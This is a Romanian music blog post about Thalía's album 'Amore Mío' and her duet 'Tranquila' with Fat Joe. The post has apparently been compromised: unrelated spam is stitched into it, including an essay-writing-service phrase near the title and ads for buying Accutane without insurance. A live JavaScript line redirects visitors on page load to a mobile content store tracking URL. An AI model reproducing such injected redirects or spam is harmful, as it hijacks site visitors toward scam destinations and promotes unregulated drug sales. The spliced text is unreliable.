Melodia zilei de 29 noiembrie 2014

professional on-line essay writing service Thalia ft Fat Joe – Tranquila

 thalia-in-mexic

Vedeta în vârstă de 43 de ani a spus că se simte liberă, lipsită de inhibiţii şi plină de pasiune.

Diva a mărturisit că pasiunea a stat la baza celor 14 piese din noul CD. La realizarea albumului, celebra artistă a colaborat cu rapperul Fat Joe şi cântăreața Becky G. Mai mult, solista le promite fanilor pentru anul viitor o colecţie de haine şi de accesorii elaborate de ea însăşi.

Thalía este cunoscută şi ca actriţă, în special pentru telenovelele ‘Marimar’ şi ‘Rosalinda’, dar şi ca scriitoare, compozitoare sau prezentatoare de radio şi televiziune.

Cântăreaţa de origine mexicană, Thalía a decis să revină în lumina reflectoarelor. Interpreta a lansat, în Mexico City, un nou album intitulat ‘Amore Mío’. Cu această ocazie, vedeta a afirmat că se simte liberă, fără inhibiţii şi plină de pasiune.

Diva latină a mărturisit că iubirea şi pasiunea au stat la baza celor 14 titluri ale noului material discografic. Alături de Fat Joe, interpretează ‘Tranquila’ care deja face furori in rândul fanilor, iar împreună cu tânara Becky G, Thalía cântă ‘Como tú no hay dos’.

Solista a declarat într-o conferinţă de presă că anul viitor va lansa propria colecţie de haine şi accesorii în colaborare cu Macy’s, dar şi că pregăteşte cel de-al doilea album ‘Viva Kids’, dupa ce primul a fost încununat de succese, printre care şi o nominalizare la Premiile Grammy.

http://thaliaromania.wordpress.com/

Online Canadian Pharmacy Store! Where To Buy Accutane online. Fastest Shipping, Price For Accutane Without Insurance.
 

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2″;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>